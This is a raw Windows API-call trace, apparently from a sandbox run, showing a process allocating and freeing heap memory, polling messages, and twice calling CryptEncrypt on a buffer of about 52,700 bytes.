wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0215.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.392] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.394] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0215.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54328 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0215.395] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xcdd9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xcde0) returned 1 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0215.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0215.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0215.400] CharLowerBuffW (in: lpsz="byte[52704]", cchLength=0xb | out: lpsz="byte[52704]") returned 0xb [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0215.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0215.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0215.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.404] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.404] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b60 [0215.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.407] CryptEncrypt (in: hKey=0xa87510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xcdd9, dwBufLen=0xcde0 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xcde0) returned 1 [0215.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0215.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0215.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0215.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 